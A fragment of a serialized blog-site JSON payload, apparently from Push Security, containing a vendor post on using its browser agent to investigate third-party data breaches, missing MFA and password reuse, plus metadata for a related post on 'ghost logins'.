browser",{"data":226750,"marks":226751,"value":226752,"nodeType":173},{},[]," to build both proactive and reactive security operations workflows, or add missing context to other data sources, such as IdP, application, or endpoint logs.",{"data":226754,"content":226757,"nodeType":312},{"target":226755},{"sys":226756},{"id":155960,"type":317,"linkType":318},[],{"data":226759,"content":226760,"nodeType":178},{},[226761],{"data":226762,"marks":226763,"value":37,"nodeType":173},{},[],{"entries":226765},{"hyperlink":226766,"inline":226767,"block":226768},[],[],[226769,226776,226784],{"sys":226770,"__typename":5345,"title":226771,"caption":226772,"layoutMode":118,"file":226773},{"id":225435},"Nobody has any identity problems, right?","Push Security’s cheekiest advisor, Geoff Belknap.",{"url":226774,"width":226775,"height":226775},"https://images.ctfassets.net/y1cdw1ablpvd/28qcLq225o8kusjQQQUnCC/98b10fe4f9e6916eb7657f60ab869062/Geoff_Ad__1_.png",1210,{"sys":226777,"__typename":5345,"title":226778,"caption":226779,"layoutMode":118,"file":226780},{"id":217818},"Telemetry comparison table","The browser presents a significant advantage over other sources of identity attack data.",{"url":226781,"width":226782,"height":226783},"https://images.ctfassets.net/y1cdw1ablpvd/4feAEpfP6tetyTjcLIopwG/5bec8c8c10e6e328ebe258bc59bc3cb6/Frame_627570__7_.png",2444,894,{"sys":226785,"__typename":15269,"type":112637,"ctaText":170057,"buttonLabel":170058,"buttonColour":15273,"buttonUrl":118},{"id":155960},"content:blog:5-reasons-why-push-security-shouldnt-exist.json","blog/5-reasons-why-push-security-shouldnt-exist.json","blog/5-reasons-why-push-security-shouldnt-exist",{"_path":226790,"_dir":1500,"_draft":6,"_partial":6,"_locale":37,"sys":226791,"ogImage":118,"summary":226793,"title":173142,"subtitle":118,"metaTitle":226804,"synopsis":185450,"hashTags":118,"publishedDate":185451,"slug":173143,"tagsCollection":226805,"relatedBlogPostsCollection":226811,"authorsCollection":228521,"content":228525,"_id":229258,"_type":5439,"_source":5440,"_file":229259,"_stem":229260,"_extension":5439},"/blog/ghost-logins-when-forgotten-identities-come-back-to-haunt-you",{"id":156725,"publishedAt":226792},"2026-02-12T12:33:05.820Z",{"json":226794},{"data":226795,"content":226796,"nodeType":165},{},[226797],{"data":226798,"content":226799,"nodeType":178},{},[226800],{"data":226801,"marks":226802,"value":226803,"nodeType":173},{},[],"How ghost logins – where an application user account can have multiple simultaneous logins using different sign-in methods – can be leveraged by attackers throughout the different stages of a cyber attack. ","What are ghost logins and how can they be exploited?",{"items":226806},[226807,226809],{"sys":226808,"name":505},{"id":504},{"sys":226810,"name":509},{"id":508},{"items":226812},[226813,227502,227897],{"__typename":1528,"sys":226814,"content":226815,"title":184068,"synopsis":184069,"hashTags":118,"publishedDate":184070,"slug":184071,"tagsCollection":227492,"authorsCollection":227498},{"id":183305},{"json":226816},{"nodeType":165,"data":226817,"content":226818},{},[226819,226824,226830,226872,226878,226884,226897,226903,226909,226978,226984,226989,226995,227001,227014,227020,227026,227046,227066,227071,227088,227094,227100,227127,227133,227139,227144,227161,227167,227173,227179,227185,227190,227207,227213,227219,227225,227231,227236,227253,227259,227265,227270,227287,227293,227299,227305,227347,227353,227414,227427,227432,227438,227444,227450,227456,227471,227477],{"nodeType":312,"data":226820,"content":226823},{"target":226821},{"sys":226822},{"id":183314,"type":317,"linkType":318},[],{"nodeType":178,"data":226825,"content":226826},{},[226827],{"nodeType":173,"value":183320,"marks":226828,"data":226829},[],{},{"nodeType":178,"data":226831,"content":226832},{},[226833,226836,226842,226845,226851,226854,226860,226863,226869],{"nodeType":173,"value":183327,"marks":226834,"data":226835},[],{},{"nodeType":186,"data":226837,"content":226838},{"uri":183332},[226839],{"nodeType":173,"value":183335,"marks":226840,"data":226841},[],{},{"nodeType":173,"value":3107,"marks":226843,"data":226844},[],{},{"nodeType":186,"data":226846,"content":226847},{"uri":183343},[226848],{"nodeType":173,"value":183346,"marks":226849,"data":226850},[],{},{"nodeType":173,"value":3107,"marks":226852,"data":226853},[],{},{"nodeType":186,"data":226855,"content":226856},{"uri":1297},[226857],{"nodeType":173,"value":183356,"marks":226858,"data":226859},[],{},{"nodeType":173,"value":3107,"marks":226861,"data":226862},[],{},{"nodeType":186,"data":226864,"content":226865},{"uri":183364},[226866],{"nodeType":173,"value":183367,"marks":226867,"data":226868},[],{},{"nodeType":173,"value":183371,"marks":226870,"data":226871},[],{},{"nodeType":178,"data":226873,"content":226874},{},[226875],{"nodeType":173,"value":183378,"marks":226876,"data":226877},[],{},{"nodeType":178,"data":226879,"content":226880},{},[226881],{"nodeType":173,"value":183385,"marks":226882,"data":226883},[],{},{"nodeType":178,"data":226885,"content":226886},{},[226887,226890,226894],{"nodeType":173,"value":183392,"marks":226888,"data":226889},[],{},{"nodeType":173,"value":183396,"marks":226891,"data":226893},[226892],{"type":370},{},{"nodeType":173,"value":1477,"marks":226895,"data":226896},[],{},{"nodeType":178,"data":226898,"content":226899},{},[226900],{"nodeType":173,"value":183407,"marks":226901,"data":226902},[],{},{"nodeType":178,"data":226904,"content":226905},{},[226906],{"nodeType":173,"value":183414,"marks":226907,"data":226908},[],{},{"nodeType":250,"data":226910,"content":226911},{},[226912,226937],{"nodeType":254,"data":226913,"content":226914},{},[226915],{"nodeType":178,"data":226916,"content":226917},{},[226918,226922,226925,226934],{"nodeType":173,"value":183427,"marks":226919,"data":226921},[226920],{"type":370},{},{"nodeType":173,"value":183432,"marks":226923,"data":226924},[],{},{"nodeType":1698,"data":226926,"content":226929},{"target":226927},{"sys":226928},{"id":183439,"type":317,"linkType":318},[226930],{"nodeType":173,"value":18649,"marks":226931,"data":226933},[226932],{"type":370},{},{"nodeType":173,"value":183446,"marks":226935,"data":226936},[],{},{"nodeType":254,"data":226938,"content":226939},{},[226940],{"nodeType":178,"data":226941,"content":226942},{},[226943,226947,226950,226956,226959,226965,226968,226975],{"nodeType":173,"value":183456,"marks":226944,"data":226946},[226945],{"type":370},{},{"nodeType":173,"value":183461,"marks":226948,"data":226949},[],{},{"nodeType":186,"data":226951,"content":226952},{"uri":183466},[226953],{"nodeType":173,"value":183469,"marks":226954,"data":226955},[],{},{"nodeType":173,"value":2936,"marks":226957,"data":226958},[],{},{"nodeType":186,"data":226960,"content":226961},{"uri":114007},[226962],{"nodeType":173,"value":183479,"marks":226963,"data":226964},[],{},{"nodeType":173,"value":183483,"marks":226966,"data":226967},[],{},{"nodeType":186,"data":226969,"content":226970},{"uri":183488},[226971],{"nodeType":173,"value":2718,"marks":226972,"data":226974},[226973],{"type":370},{},{"nodeType":173,"value":183495,"marks":226976,"data":226977},[],{},{"nodeType":178,"data":226979,"content":226980},{},[226981],{"nodeType":173,"value":183502,"marks":226982,"data":226983},[],{},{"nodeType":312,"data":226985,"content":226988},{"target":226986},{"sys":226987},{"id":169040,"type":317,"linkType":318},[],{"nodeType":169,"data":226990,"content":226991},{},[226992],{"nodeType":173,"value":183514,"marks":226993,"data":226994},[],{},{"nodeType":178,"data":226996,"content":226997},{},[226998],{"nodeType":173,"value":183521,"marks":226999,"data":227000},[],{},{"nodeType":178,"data":227002,"content":227003},{},[227004,227007,227011],{"nodeType":173,"value":183528,"marks":227005,"data":227006},[],{},{"nodeType":173,"value":18649,"marks":227008,"data":227010},[227009],{"type":370},{},{"nodeType":173,"value":183536,"marks":227012,"data":227013},[],{},{"nodeType":178,"data":227015,"content":227016},{},[227017],{"nodeType":173,"value":183543,"marks":227018,"data":227019},[],{},{"nodeType":235,"data":227021,"content":227022},{},[227023],{"nodeType":173,"value":24345,"marks":227024,"data":227025},[],{},{"nodeType":178,"data":227027,"content":227028},{},[227029,227032,227036,227039,227043],{"nodeType":173,"value":183556,"marks":227030,"data":227031},[],{},{"nodeType":173,"value":183560,"marks":227033,"data":227035},[227034],{"type":370},{},{"nodeType":173,"value":933,"marks":227037,"data":227038},[],{},{"nodeType":173,"value":183568,"marks":227040,"data":227042},[227041],{"type":370},{},{"nodeType":173,"value":1477,"marks":227044,"data":227045},[],{},{"nodeType":178,"data":227047,"content":227048},{},[227049,227052,227056,227059,227063],{"nodeType":173,"value":183579,"marks":227050,"data":227051},[],{},{"nodeType":173,"value":2740,"marks":227053,"data":227055},[227054],{"type":370},{},{"nodeType":173,"value":1464,"marks":227057,"data":227058},[],{},{"nodeType":173,"value":2748,"marks":227060,"data":227062},[227061],{"type":370},{},{"nodeType":173,"value":183594,"marks":227064,"data":227065},[],{},{"nodeType":312,"data":227067,"content":227070},{"target":227068},{"sys":227069},{"id":156217,"type":317,"linkType":318},[],{"nodeType":178,"data":227072,"content":227073},{},[227074,227077,227085],{"nodeType":173,"value":183606,"marks":227075,"data":227076},[],{},{"nodeType":1698,"data":227078,"content":227081},{"target":227079},{"sys":227080},{"id":2148,"type":317,"linkType":318},[227082],{"nodeType":173,"value":65996,"marks":227083,"data":227084},[],{},{"nodeType":173,"value":37,"marks":227086,"data":227087},[],{},{"nodeType":235,"data":227089,"content":227090},{},[227091],{"nodeType":173,"value":125683,"marks":227092,"data":227093},[],{},{"nodeType":178,"data":227095,"content":227096},{},[227097],{"nodeType":173,"value":183630,"marks":227098,"data":227099},[],{},{"nodeType":178,"data":227101,"content":227102},{},[227103,227106,227110,227113,227117,227120,227124],{"nodeType":173,"value":183637,"marks":227104,"data":227105},[],{},{"nodeType":173,"value":2740,"marks":227107,"data":227109},[227108],{"type":370},{},{"nodeType":173,"value":1464,"marks":227111,"data":227112},[],{},{"nodeType":173,"value":2748,"marks":227114,"data":227116},[227115],{"type":370},{},{"nodeType":173,"value":183652,"marks":227118,"data":227119},[],{},{"nodeType":173,"value":2701,"marks":227121,"data":227123},[227122],{"type":370},{},{"nodeType":173,"value":183660,"marks":227125,"data":227126},[],{},{"nodeType":178,"data":227128,"content":227129},{},[227130],{"nodeType":173,"value":183667,"marks":227131,"data":227132},[],{},{"nodeType":178,"data":227134,"content":227135},{},[227136],{"nodeType":173,"value":183674,"marks":227137,"data":227138},[],{},{"nodeType":312,"data":227140,"content":227143},{"target":227141},{"sys":227142},{"id":183681,"type":317,"linkType":318},[],{"nodeType":178,"data":227145,"content":227146},{},[227147,227150,227158],{"nodeType":173,"value":183606,"marks":227148,"data":227149},[],{},{"nodeType":1698,"data":227151,"content":227154},{"target":227152},{"sys":227153},{"id":2405,"type":317,"linkType":318},[227155],{"nodeType":173,"value":125683,"marks":227156,"data":227157},[],{},{"nodeType":173,"value":37,"marks":227159,"data":227160},[],{},{"nodeType":235,"data":227162,"content":227163},{},[227164],{"nodeType":173,"value":157048,"marks":227165,"data":227166},[],{},{"nodeType":178,"data":227168,"content":227169},{},[227170],{"nodeType":173,"value":183710,"marks":227171,"data":227172},[],{},{"nodeType":178,"data":227174,"content":227175},{},[227176],{"nodeType":173,"value":183717,"marks":227177,"data":227178},[],{},{"nodeType":178,"data":227180,"content":227181},{},[227182],{"nodeType":173,"value":183724,"marks":227183,"data":227184},[],{},{"nodeType":312,"data":227186,"content":227189},{"target":227187},{"sys":227188},{"id":183731,"type":317,"linkType":318},[],{"nodeType":178,"data":227191,"content":227192},{},[227193,227196,227204],{"nodeType":173,"value":183606,"marks":227194,"data":227195},[],{},{"nodeType":1698,"data":227197,"content":227200},{"target":227198},{"sys":227199},{"id":183743,"type":317,"linkType":318},[227201],{"nodeType":173,"value":157048,"marks":227202,"data":227203},[],{},{"nodeType":173,"value":37,"marks":227205,"data":227206},[],{},{"nodeType":235,"data":227208,"content":227209},{},[227210],{"nodeType":173,"value":183755,"marks":227211,"data":227212},[],{},{"nodeType":178,"data":227214,"content":227215},{},[227216],{"nodeType":173,"value":183762,"marks":227217,"data":227218},[],{},{"nodeType":178,"data":227220,"content":227221},{},[227222],{"nodeType":173,"value":183769,"marks":227223,"data":227224},[],{},{"nodeType":178,"data":227226,"content":227227},{},[227228],{"nodeType":173,"value":183776,"marks":227229,"data":227230},[],{},{"nodeType":312,"data":227232,"content":227235},{"target":227233},{"sys":227234},{"id":183783,"type":317,"linkType":318},[],{"nodeType":178,"data":227237,"content":227238},{},[227239,227242,227250],{"nodeType":173,"value":183606,"marks":227240,"data":227241},[],{},{"nodeType":1698,"data":227243,"content":227246},{"target":227244},{"sys":227245},{"id":114256,"type":317,"linkType":318},[227247],{"nodeType":173,"value":114259,"marks":227248,"data":227249},[],{},{"nodeType":173,"value":37,"marks":227251,"data":227252},[],{},{"nodeType":235,"data":227254,"content":227255},{},[227256],{"nodeType":173,"value":2631,"marks":227257,"data":227258},[],{},{"nodeType":178,"data":227260,"content":227261},{},[227262],{"nodeType":173,"value":183812,"marks":227263,"data":227264},[],{},{"nodeType":312,"data":227266,"content":227269},{"target":227267},{"sys":227268},{"id":183819,"type":317,"linkType":318},[],{"nodeType":178,"data":227271,"content":227272},{},[227273,227276,227284],{"nodeType":173,"value":183606,"marks":227274,"data":227275},[],{},{"nodeType":1698,"data":227277,"content":227280},{"target":227278},{"sys":227279},{"id":2466,"type":317,"linkType":318},[227281],{"nodeType":173,"value":126474,"marks":227282,"data":227283},[],{},{"nodeType":173,"value":37,"marks":227285,"data":227286},[],{},{"nodeType":169,"data":227288,"content":227289},{},[227290],{"nodeType":173,"value":183842,"marks":227291,"data":227292},[],{},{"nodeType":178,"data":227294,"content":227295},{},[227296],{"nodeType":173,"value":183849,"marks":227297,"data":227298},[],{},{"nodeType":178,"data":227300,"content":227301},{},[227302],{"nodeType":173,"value":183856,"marks":227303,"data":227304},[],{},{"nodeType":250,"data":227306,"content":227307},{},[227308,227321,227334],{"nodeType":254,"data":227309,"content":227310},{},[227311],{"nodeType":178,"data":227312,"content":227313},{},[227314,227318],{"nodeType":173,"value":157359,"marks":227315,"data":227317},[227316],{"type":370},{},{"nodeType":173,"value":157364,"marks":227319,"data":227320},[],{},{"nodeType":254,"data":227322,"content":227323},{},[227324],{"nodeType":178,"data":227325,"content":227326},{},[227327,227331],{"nodeType":173,"value":157374,"marks":227328,"data":227330},[227329],{"type":370},{},{"nodeType":173,"value":157379,"marks":227332,"data":227333},[],{},{"nodeType":254,"data":227335,"content":227336},{},[227337],{"nodeType":178,"data":227338,"content":227339},{},[227340,227344],{"nodeType":173,"value":157389,"marks":227341,"data":227343},[227342],{"type":370},{},{"nodeType":173,"value":157394,"marks":227345,"data":227346},[],{},{"nodeType":178,"data":227348,"content":227349},{},[227350],{"nodeType":173,"value":183905,"marks":227351,"data":227352},[],{},{"nodeType":250,"data":227354,"content":227355},{},[227356,227372,227388,227401],{"nodeType":254,"data":227357,"content":227358},{},[227359],{"nodeType":178,"data":227360,"content":227361},{},[227362,227365,227369],{"nodeType":173,"value":183918,"marks":227363,"data":227364},[],{},{"nodeType":173,"value":183922,"marks":227366,"data":227368},[227367],{"type":370},{},{"nodeType":173,"value":157428,"marks":227370,"data":227371},[],{},{"nodeType":254,"data":227373,"content":227374},{},[227375],{"nodeType":178,"data":227376,"content":227377},{},[227378,227381,227385],{"nodeType":173,"value":183936,"marks":227379,"data":227380},[],{},{"nodeType":173,"value":183940,"marks":227382,"data":227384},[227383],{"type":370},{},{"nodeType":173,"value":183945,"marks":227386,"data":227387},[],{},{"nodeType":254,"data":227389,"content":227390},{},[227391],{"nodeType":178,"data":227392,"content":227393},{},[227394,227398],{"nodeType":173,"value":183955,"marks":227395,"data":227397},[227396],{"type":370},{},{"nodeType":173,"value":183960,"marks":227399,"data":227400},[],{},{"nodeType":254,"data":227402,"content":227403},{},[227404],{"nodeType":178,"data":227405,"content":227406},{},[227407,227411],{"nodeType":173,"value":183970,"marks":227408,"data":227410},[227409],{"type":370},{},{"nodeType":173,"value":183975,"marks":227412,"data":227413},[],{},{"nodeType":178,"data":227415,"content":227416},{},[227417,227420,227424],{"nodeType":173,"value":183982,"marks":227418,"data":227419},[],{},{"nodeType":173,"value":2718,"marks":227421,"data":227423},[227422],{"type":370},{},{"nodeType":173,"value":183990,"marks":227425,"data":227426},[],{},{"nodeType":312,"data":227428,"content":227431},{"target":227429},{"sys":227430},{"id":183997,"type":317,"linkType":318},[],{"nodeType":178,"data":227433,"content":227434},{},[227435],{"nodeType":173,"value":184003,"marks":227436,"data":227437},[],{},{"nodeType":169,"data":227439,"content":227440},{},[227441],{"nodeType":173,"value":184010,"marks":227442,"data":227443},[],{},{"nodeType":178,"data":227445,"content":227446},{},[227447],{"nodeType":173,"value":184017,"marks":227448,"data":227449},[],{},{"nodeType":178,"data":227451,"content":227452},{},[227453],{"nodeType":173,"value":184024,"marks":227454,"data":227455},[],{},{"nodeType":178,"data":227457,"content":227458},{},[227459,227462,227468],{"nodeType":173,"value":184031,"marks":227460,"data":227461},[],{},{"nodeType":186,"data":227463,"content":227464},{"uri":114007},[227465],{"nodeType":173,"value":184038,"marks":227466,"data":227467},[],{},{"nodeType":173,"value":184042,"marks":227469,"data":227470},[],{},{"nodeType":169,"data":227472,"content":227473},{},[227474],{"nodeType":173,"value":71801,"marks":227475,"data":227476},[],{},{"nodeType":178,"data":227478,"content":227479},{},[227480,227483,227489],{"nodeType":173,"value":184055,"marks":227481,"data":227482},[],{},{"nodeType":186,"data":227484,"content":227485},{"uri":114457},[227486],{"nodeType":173,"value":88194,"marks":227487,"data":227488},[],{},{"nodeType":173,"value":184065,"marks":227490,"data":227491},[],{},{"items":227493},[227494,227496],{"sys":227495,"name":18399},{"id":18398},{"sys":227497,"name":509},{"id":508},{"items":227499},[227500],{"fullName":2908,"firstName":2909,"jobTitle":514,"profilePicture":227501},{"url":2911},{"__typename":1528,"sys":227503,"content":227505,"title":227883,"synopsis":227884,"hashTags":118,"publishedDate":227885,"slug":227886,"tagsCollection":227887,"authorsCollection":227893},{"id":227504},"4pXsh0RffPhT783P6CNlOA",{"json":227506},{"nodeType":165,"data":227507,"content":227508},{},[227509,227516,227523,227529,227536,227543,227550,227557,227564,227571,227634,227640,227647,227654,227669,227676,227683,227690,227697,227704,227711,227721,227728,227734,227741,227748,227755,227762,227769,227775,227782,227801,227808,227815,227822,227865],{"nodeType":178,"data":227510,"content":227511},{},[227512],{"nodeType":173,"value":227513,"marks":227514,"data":227515},"When the media reports that a popular third-party service provider has suffered a breach and stolen credentials are being sold online, it’s inevitable for your security team to get asked, “Are we affected by this?”",[],{},{"nodeType":178,"data":227517,"content":227518},{},[227519],{"nodeType":173,"value":227520,"marks":227521,"data":227522},"Push helps its customers to answer this question in seconds and with absolute certainty. Here’s how.",[],{},{"nodeType":312,"data":227524,"content":227528},{"target":227525},{"sys":227526},{"id":227527,"type":317,"linkType":318},"56lMG3VskDDU1dUHzgQxFK",[],{"nodeType":169,"data":227530,"content":227531},{},[227532],{"nodeType":173,"value":227533,"marks":227534,"data":227535},"Step 1: Are we using the breached service?",[],{},{"nodeType":178,"data":227537,"content":227538},{},[227539],{"nodeType":173,"value":227540,"marks":227541,"data":227542},"If this service is IT-managed in your organization, then you can probably answer this relatively quickly – at least for the tenant that is IT-managed. If it’s not, then you're going to need to check. ",[],{},{"nodeType":178,"data":227544,"content":227545},{},[227546],{"nodeType":173,"value":227547,"marks":227548,"data":227549},"That’s because end-users increasingly create SaaS accounts and tenants themselves without going through IT. When a third-party data breach hits the headlines, security teams are often surprised to find out that they have people in their organizations using that service.",[],{},{"nodeType":178,"data":227551,"content":227552},{},[227553],{"nodeType":173,"value":227554,"marks":227555,"data":227556},"Push uses a browser agent to track every login to every application made by your employees. It offers ground truth for answering questions like: Are we using the service? Who in the business is using it, and how are they accessing it?",[],{},{"nodeType":178,"data":227558,"content":227559},{},[227560],{"nodeType":173,"value":227561,"marks":227562,"data":227563},"Push can also highlight issues like missing MFA and if an employee is re-using the same password across multiple services — vital information if user credentials for the breached service have been leaked.",[],{},{"nodeType":178,"data":227565,"content":227566},{},[227567],{"nodeType":173,"value":227568,"marks":227569,"data":227570},"There are other data sources that can be used, but they all have their drawbacks:    ",[],{},{"nodeType":250,"data":227572,"content":227573},{},[227574,227589,227604,227619],{"nodeType":254,"data":227575,"content":227576},{},[227577],{"nodeType":178,"data":227578,"content":227579},{},[227580,227585],{"nodeType":173,"value":227581,"marks":227582,"data":227584},"Network or SWG",[227583],{"type":370},{},{"nodeType":173,"value":227586,"marks":227587,"data":227588}," can show you whose endpoints accessed an app website, but not if they've ever logged into the app.",[],{},{"nodeType":254,"data":227590,"content":227591},{},[227592],{"nodeType":178,"data":227593,"content":227594},{},[227595,227600],{"nodeType":173,"value":227596,"marks":227597,"data":227599},"IdP",[227598],{"type":370},{},{"nodeType":173,"value":227601,"marks":227602,"data":227603}," can show you that you're using an app if it’s accessed using SSO, but if that’s the case then you already know about it. It won’t show you non-SSO apps, tenants, or accounts that are more likely to be compromised using stolen credentials.",[],{},{"nodeType":254,"data":227605,"content":227606},{},[227607],{"nodeType":178,"data":227608,"content":227609},{},[227610,227615],{"nodeType":173,"value":227611,"marks":227612,"data":227614},"Email",[227613],{"type":370},{},{"nodeType":173,"value":227616,"marks":227617,"data":227618}," can be used to quickly tell you if employees have received email from an app – indicating an account might exist – but won’t tell you if they signed up using personal email, when they last logged in or if they are using the same password for everything.",[],{},{"nodeType":254,"data":227620,"content":227621},{},[227622],{"nodeType":178,"data":227623,"content":227624},{},[227625,227630],{"nodeType":173,"value":227626,"marks":227627,"data":227629},"Finance / contract records",[227628],{"type":370},{},{"nodeType":173,"value":227631,"marks":227632,"data":227633}," take time to search through and will only cover the services you pay for (many SaaS products offer a free tier). Obviously these records won’t tell you anything about vulnerable accounts.  \n",[],{},{"nodeType":312,"data":227635,"content":227639},{"target":227636},{"sys":227637},{"id":227638,"type":317,"linkType":318},"3pLEarsM0oltdxGlkHATbB",[],{"nodeType":169,"data":227641,"content":227642},{},[227643],{"nodeType":173,"value":227644,"marks":227645,"data":227646},"Step 2: Are any of our accounts currently vulnerable to account takeover through stolen creds?",[],{},{"nodeType":178,"data":227648,"content":227649},{},[227650],{"nodeType":173,"value":227651,"marks":227652,"data":227653},"If credentials are being sold on the dark web for a service your employees use, then you need to quickly determine whether any workforce accounts can be accessed using just the stolen credentials. In other words, are any of these accounts using a leaked password and/or missing MFA?",[],{},{"nodeType":178,"data":227655,"content":227656},{},[227657,227661,227665],{"nodeType":173,"value":227658,"marks":227659,"data":227660},"At this point, you might reach for your IdP and make sure that MFA is enforced for all logins to the affected app. But that’s only going to cover apps and tenants already using SSO. To make things more complicated, most apps still allow username and password logins in addition to SSO logins. You need to see accounts with SSO logins ",[],{},{"nodeType":173,"value":4892,"marks":227662,"data":227664},[227663],{"type":1646},{},{"nodeType":173,"value":227666,"marks":227667,"data":227668}," local logins. ",[],{},{"nodeType":178,"data":227670,"content":227671},{},[227672],{"nodeType":173,"value":227673,"marks":227674,"data":227675},"The data that Push collects in the browser provides rich web app context. That means Push shows you how your employees are authenticating on every app, whether it’s password, OIDC, or SAML. ",[],{},{"nodeType":178,"data":227677,"content":227678},{},[227679],{"nodeType":173,"value":227680,"marks":227681,"data":227682},"When you search for a breached third-party service in Push, you’ll see which employees are using usernames and passwords but missing MFA on their accounts. You can then prioritize these accounts for password resets and enabling MFA to stop any stolen credentials from being used to access those accounts. ",[],{},{"nodeType":178,"data":227684,"content":227685},{},[227686],{"nodeType":173,"value":227687,"marks":227688,"data":227689},"As well as highlighting accounts missing MFA, Push fingerprints every password using a shortened salted hash and checks in the browser whether it has been leaked and/or is easily guessable. Armed with this information, you can quickly get these vulnerabilities fixed to reduce the likelihood of an account takeover.",[],{},{"nodeType":169,"data":227691,"content":227692},{},[227693],{"nodeType":173,"value":227694,"marks":227695,"data":227696},"Step 3: Are the stolen credentials being used anywhere else? ",[],{},{"nodeType":178,"data":227698,"content":227699},{},[227700],{"nodeType":173,"value":227701,"marks":227702,"data":227703},"The next consideration is whether the stolen credentials can be used by an attacker in a credential-stuffing attack to compromise accounts on other applications. ",[],{},{"nodeType":178,"data":227705,"content":227706},{},[227707],{"nodeType":173,"value":227708,"marks":227709,"data":227710},"This is an important, and often overlooked, ring of the third-party data breach blast radius. ",[],{},{"nodeType":3769,"data":227712,"content":227713},{},[227714],{"nodeType":178,"data":227715,"content":227716},{},[227717],{"nodeType":173,"value":227718,"marks":227719,"data":227720},"Here at Push, we see that on average 1 in 3 users in every business reuse passwords across multiple accounts.",[],{},{"nodeType":178,"data":227722,"content":227723},{},[227724],{"nodeType":173,"value":227725,"marks":227726,"data":227727},"The password checks performed by Push also identify password reuse between applications. So if there’s a chance that a password has been stolen as part of the third-party data breach, you can make sure it’s changed across all applications. ",[],{},{"nodeType":312,"data":227729,"content":227733},{"target":227730},{"sys":227731},{"id":227732,"type":317,"linkType":318},"X9axqTO6dWEe1Jy49hAyG",[],{"nodeType":169,"data":227735,"content":227736},{},[227737],{"nodeType":173,"value":227738,"marks":227739,"data":227740},"Take action before breaches hit the headlines",[],{},{"nodeType":178,"data":227742,"content":227743},{},[227744],{"nodeType":173,"value":227745,"marks":227746,"data":227747},"The workflow described above takes seconds to perform in Push. It enables you to quickly investigate a third-party data breach to determine if you could have been impacted, and if so, to take targeted action to mitigate the risks. ",[],{},{"nodeType":178,"data":227749,"content":227750},{},[227751],{"nodeType":173,"value":227752,"marks":227753,"data":227754},"That said, no one enjoys scrambling to respond to these kinds of incidents. If you use Push, you can actually get out ahead of these issues so you’re not stuck having to react.",[],{},{"nodeType":178,"data":227756,"content":227757},{},[227758],{"nodeType":173,"value":227759,"marks":227760,"data":227761},"Push integrates stolen account threat intelligence and alerts you when employees are currently using the same password that’s being sold on the dark web. This allows you to take action at the earliest possible opportunity and harden vulnerable accounts before any data breach is reported in the media. ",[],{},{"nodeType":178,"data":227763,"content":227764},{},[227765],{"nodeType":173,"value":227766,"marks":227767,"data":227768},"What this means for you is that next time you’re asked, “Does this affect us?” you can say you dealt with any issues way before it landed in the headlines. ",[],{},{"nodeType":312,"data":227770,"content":227774},{"target":227771},{"sys":227772},{"id":227773,"type":317,"linkType":318},"2vFMyWtMlxzTqqtvCPmlGW",[],{"nodeType":235,"data":227776,"content":227777},{},[227778],{"nodeType":173,"value":227779,"marks":227780,"data":227781},"Do we need to log in to another security tool to do this?",[],{},{"nodeType":178,"data":227783,"content":227784},{},[227785,227789,227797],{"nodeType":173,"value":227786,"marks":227787,"data":227788},"No. Using the ",[],{},{"nodeType":186,"data":227790,"content":227791},{"uri":112017},[227792],{"nodeType":173,"value":227793,"marks":227794,"data":227796},"Push API",[227795],{"type":194},{},{"nodeType":173,"value":227798,"marks":227799,"data":227800},", you can quickly gather relevant data to support the response to a third-party data breach in your SIEM or XDR solution.",[],{},{"nodeType":235,"data":227802,"content":227803},{},[227804],{"nodeType":173,"value":227805,"marks":227806,"data":227807},"Why not eliminate the risk of password-based attacks altogether? ",[],{},{"nodeType":178,"data":227809,"content":227810},{},[227811],{"nodeType":173,"value":227812,"marks":227813,"data":227814},"Push gives you the ability to react quickly and decisively to a third-party data breach. But it also enables you to take proactive steps to eliminate the risk of password-based attacks altogether so stolen credentials from third-party data breaches no longer pose a threat to your business. ",[],{},{"nodeType":178,"data":227816,"content":227817},{},[227818],{"nodeType":173,"value":227819,"marks":227820,"data":227821},"Push does this by:",[],{},{"nodeType":250,"data":227823,"content":227824},{},[227825,227835,227845,227855],{"nodeType":254,"data":227826,"content":227827},{},[227828],{"nodeType":178,"data":227829,"content":227830},{},[227831],{"nodeType":173,"value":227832,"marks":227833,"data":227834},"Stopping your employees from creating accounts with leaked, weak and reused passwords.",[],{},{"nodeType":254,"data":227836,"content":227837},{},[227838],{"nodeType":178,"data":227839,"content":227840},{},[227841],{"nodeType":173,"value":227842,"marks":227843,"data":227844},"Pinning passwords to individual apps. ",[],{},{"nodeType":254,"data":227846,"content":227847},{},[227848],{"nodeType":178,"data":227849,"content":227850},{},[227851],{"nodeType":173,"value":227852,"marks":227853,"data":227854},"Helping you to get all apps and accounts behind SSO.",[],{},{"nodeType":254,"data":227856,"content":227857},{},[227858],{"nodeType":178,"data":227859,"content":227860},{},[227861],{"nodeType":173,"value":227862,"marks":227863,"data":227864},"Blocking phishing attacks against your employees so their credentials aren’t stolen.",[],{},{"nodeType":178,"data":227866,"content":227867},{},[227868,227872,227879],{"nodeType":173,"value":227869,"marks":227870,"data":227871},"If you want to find out more about how Push can help you mitigate the risks of employee credentials being stolen in the third-party data breach, then ",[],{},{"nodeType":186,"data":227873,"content":227874},{"uri":473},[227875],{"nodeType":173,"value":88194,"marks":227876,"data":227878},[227877],{"type":194},{},{"nodeType":173,"value":227880,"marks":227881,"data":227882}," and we’ll be happy to show you. ",[],{},"Investigating and responding to a third-party data breach using Push","How to use Push to investigate and respond to a third-party data breach, which results in credentials being stolen and sold on criminal marketplaces.  ","2024-06-13T00:00:00.000Z","investigating-and-responding-to-a-third-party-data-breach-using-push",{"items":227888},[227889,227891],{"sys":227890,"name":509},{"id":508},{"sys":227892,"name":26137},{"id":26136},{"items":227894},[227895],{"fullName":513,"firstName":71176,"jobTitle":514,"profilePicture":227896},{"url":516},{"__typename":1528,"sys":227898,"content":227900,"title":162246,"synopsis":228508,"hashTags":118,"publishedDate":228509,"slug":228510,"tagsCollection":228511,"authorsCollection":228517},{"id":227899},"6ckZjBZzRgvEVpSScGWeZQ",{"json":227901},{"data":227902,"content":227903,"nodeType":165},{},[227904,227923,227930,227937,227954,227961,227978,227985,227992,228025,228032,228039,228046,228053,228086,228091,228097,228116,228123,228130,228137,228170,228177,228184,228191,228208,228214,228220,228226,228233,228254,228261,228268,228275,228282,228345,228352,228395,228402,228408,228415,228430,228435,228441,228448,228481,228487,228494,228501],{"data":227905,"content":227906,"nodeType":178},{},[227907,227911,227919],{"data":227908,"marks":227909,"value":227910,"nodeType":173},{},[],"We have spoken previously about ",{"data":227912,"content":227913,"nodeType":186},{"uri":70029},[227914],{"data":227915,"marks":227916,"value":227918,"nodeType":173},{},[227917],{"type":194},"SAMLjacking and poisoned 